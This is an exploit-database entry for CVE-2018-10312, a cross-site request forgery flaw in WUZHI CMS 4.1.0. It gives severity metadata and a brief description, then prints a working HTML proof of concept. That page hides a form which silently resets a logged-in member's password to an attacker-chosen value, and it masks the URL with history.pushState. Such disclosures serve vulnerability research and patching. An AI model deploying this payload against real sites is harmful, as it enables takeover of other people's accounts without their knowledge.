header-logo
Suggest Exploit
vendor:
WUZHI CMS
by:
jiguang (s1@jiguang.in)
8.8
CVSS
HIGH
Cross-Site Request Forgery
352
CWE
Product Name: WUZHI CMS
Affected Version From: 4.1.0
Affected Version To: 4.1.0
Patch Exists: YES
Related CWE: CVE-2018-10312
CPE: a:wuzhicms:wuzhicms:4.1.0
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: None
2018

WUZHI CMS 4.1.0 – Cross-Site Request Forgery

An issue was discovered in WUZHI CMS 4.1.0 (https://github.com/wuzhicms/wuzhicms/issues/132) There is a csrf vulnerability that can modifying the member's password. via index.php?m=member&v=pw_reset After the member logged in. open the exp page

Mitigation:

The user should be aware of the risks of Cross-Site Request Forgery and take steps to protect against it, such as using a secure token or other authentication mechanism.
Source

Exploit-DB raw data:

# Exploit Title: WUZHI CMS 4.1.0 - Cross-Site Request Forgery
# Date: 2018-04-23
# Exploit Author: jiguang (s1@jiguang.in)
# Vendor Homepage: https://github.com/wuzhicms/wuzhicms
# Software Link: https://github.com/wuzhicms/wuzhicms
# Version: 4.1.0
# CVE: CVE-2018-10312

An issue was discovered in WUZHI CMS 4.1.0 (https://github.com/wuzhicms/wuzhicms/issues/132)
There is a  csrf vulnerability that can modifying the member's password. via index.php?m=member&v=pw_reset
After the member logged in. open the exp page

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost/www/index.php?m=member&v=pw_reset" method="POST">
      <input type="hidden" name="password" value="yuduo" />
      <input type="hidden" name="password2" value="yuduo" />
      <input type="hidden" name="submit" value="ç&#161;&#174;&#32;å&#174;&#154;" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>